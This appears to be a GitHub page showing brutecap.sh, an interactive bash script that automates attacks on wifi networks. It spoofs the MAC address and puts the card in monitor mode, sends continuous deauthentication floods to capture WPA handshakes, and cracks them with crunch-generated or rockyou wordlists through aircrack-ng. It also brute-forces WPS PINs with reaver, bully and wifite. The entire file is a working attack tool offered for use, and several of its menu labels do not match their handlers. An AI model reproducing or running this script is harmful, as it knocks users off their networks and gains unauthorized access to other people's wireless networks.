-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathbrutecap.sh
More file actions
247 lines (208 loc) · 7.34 KB
/
brutecap.sh
File metadata and controls
247 lines (208 loc) · 7.34 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
#!/bin/bash
if [ $EUID -ne 0 ]; then
sudo "$0" "$@"
exit $1
fi
gzip -d /usr/share/wordlists/rockyou.txt
clear
sleep 1
figlet BruteCap
echo "This script is for capturing and bruteforcing a wifi handshake capture, along with bruteforcing wps pins."
echo "Select an interface:"
interfaces=`ip link | awk -F: '$0 !~ "lo|vir|^[^0-9]"{print $2a;getline}'`
select option in $interfaces; do
echo "$option selected"
echo "Enabling monitor mode"
sleep 1
sudo ifconfig $option down
sudo macchanger -r $option
sleep 1
sudo iwconfig $option mode monitor
sudo ifconfig $option up
clear
Attack_Options="Regex_Scan Regex_Capture Cap_BruteForce WPS_attacks Change_Interface Exit"
select ption in $Attack_Options; do
case $ption in
#scan for aps
Regex_Scan)
clear
read -p "Time to scan in secs: " time
echo "scaning..."
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time xterm -hold -e sudo airodump-ng $option
;;
#capture handshakes
Regex_Capture)
clear
read -p "Time to scan in secs: " time
echo "Copy BSSID, station mac and channel from scan, press space to pause scan"
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo airodump-ng -M -W $option > /dev/null 2>&1 &
read -p "BSSID to capture from: " BSSID
read -p "Channel: " CHANNEL
read -p "Station to deauth: " STATION
read -p "Name for capture file: " FILE
nohup xterm -hold -e sudo airodump-ng -c$CHANNEL -w $FILE -d $BSSID $option > /dev/null 2>&1 &
xterm -hold -e sudo aireplay-ng --deauth 0 -a $BSSID -c $STATION $option
;;
#handshake bruteforce
Handshake_BruteForce)
clear
echo "Bruteforcing a handshake capture with aircrack-ng"
Cracking_Options="Custom_Charset Crunch_Charset Wordlist_Brute Main_Menu"
select cracking_option in $Cracking_Options; do
case $cracking_option in
#Custom charset with crunch
CustomCharset)
clear
echo "Make custom charsets with crunch"
echo "Leave input blank and press enter for an uneeded option"
read -p "Min length: " min
read -p "Max length: " max
echo "Crunch options:"
echo "@=lower case letters ; ,=capital letters ; %=numbers ; ^=symbols"
echo "Example options: @,%^possible password"
read -p "Enter crunch options and possible password: " possible
read -p "Enter own characters for custom charset: " custom
read -p "Enter path of handshake capture: " path
read -p "SSID: " ssid
xterm -hold -e sudo crunch $min $max -t $possible $custom | sudo aircrack-ng -w - $path -e $ssid
;;
#regular crunch charset
Crunch_Charset)
clear
echo "Use crunch charsets"
read -p "Min length: " min
read -p "Max length: " max
echo "Crunch options:"
echo "@=lower case letters ; ,=capital letters ; %=numbers ; ^=symbols"
echo "Example options: @,%^possible password"
read -p "Enter crunch options and possible password: " possible
read -p "Enter path of handshake capture: " path
read -p "ssid: " ssid
xterm -hold -e sudo crunch $min $max -t $possible -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space | sudo aircrack-ng -w - $path -e $ssid
;;
#bruteforce with rockyou wordlist, can be changed to a different wordlist
Word_listBrute)
clear
echo "Bruteforce with wordlist"
read -p "Enter path of handshake capture " path
xterm -hold -e sudo aircrack-ng $path -w /usr/share/wordlists/rockyou.txt
;;
Main_Menu)
clear
break
;;
*)
echo "Invalid character"
sleep 1
clear
;;
esac
done
;;
WPS_attacks)
clear
wps_options="Scan Pixie_Dust Null_Pin Wifite_Brute Bully_Brute Reaver_Brute_without_pixie Main_Menu"
echo "Select an attack option"
select wps_option in $wps_options; do
case $wps_option in
#scan for aps wit wps enabled
Scan)
clear
read -p "Amount of time to scan for in secs: " time
echo "scanning..."
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
;;
#bruteforce withh known default wps pins
Pixie_Dust)
clear
echo "For bruteforcing to stay stable, it recommended to associate with the target network"
read -p "Amount of time to scan for in secs: " time
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
echo "close xterm before entering essid"
read -p "enter bssid: " bssid
read -p "enter essid: " essid
read -p "Set delay in secs" delay
sudo ifconfig $option down
sudo macchanger -p $option
sudo ifconfig $option up
sudo macchanger -s $option
iwlist $option channel | grep Current
read -p "Set same channel as target network: " channel
sudo iwconfig $option channel $channel
read -p "network card mac: " mac
sudo aireplay-ng -1 0 -e $essid -a $bssid -h $mac $option
echo "Association complete, starting bruteforce..."
sleep 1
xterm -hold -e sudo reaver -c $channel -i $option -b $bssid -d$delay -vv -K 1
;;
#trying to connect with no pin
Null_Pin)
clear
echo "Null pin attack is bruteforcing with no pin"
read -p "Amount of time to scan for in secs: " time
echo "scanning..."
sleep 1
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
iwlist $option channel | grep Current
echo "close xterm before entering bssid"
read -p "enter channel: " channel
read -p "enter bssid:" bssid
xterm -hold -e sudo reaver -c $channel -i $option -b $bssid -p "" -N
;;
#open up wifite
Wifite_Brute)
clear
xterm -hold -e sudo wifite -i $option -mac --wps
;;
#bruteforce with bully
Bully_Brute)
clear
read -p "Amount of time to scan for in secs: " time
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
echo "close xterm before entering essid"
read -p "enter bssid: " bssid
read -p "enter essid: " essid
xterm -hold -e sudo bully $option -b $bssid -e $essid
;;
#reaver bruteforce with no pin
Reaver_Brute_without_pixie)
clear
read -p "Amount of time to scan for in secs: " time
nohup timeout $time xterm -hold -e termdown $time > /dev/null 2>&1 &
timeout $time nohup xterm -hold -e sudo wash -i $option > /dev/null 2>&1 &
read -p "enter bssid: " bssid
read -p "enter essid: " essid
read -p "enter delay in secs: " delay
xterm -hold -e sudo reaver -i $option -b $bssid -e $essid -d$delay
;;
Main_Menu)
clear
break
;;
*)
clear
echo "invalid character"
;;
esac
done
;;
Change_Interface)
clear
break
;;
Exit)
clear
exit
;;
esac
done
done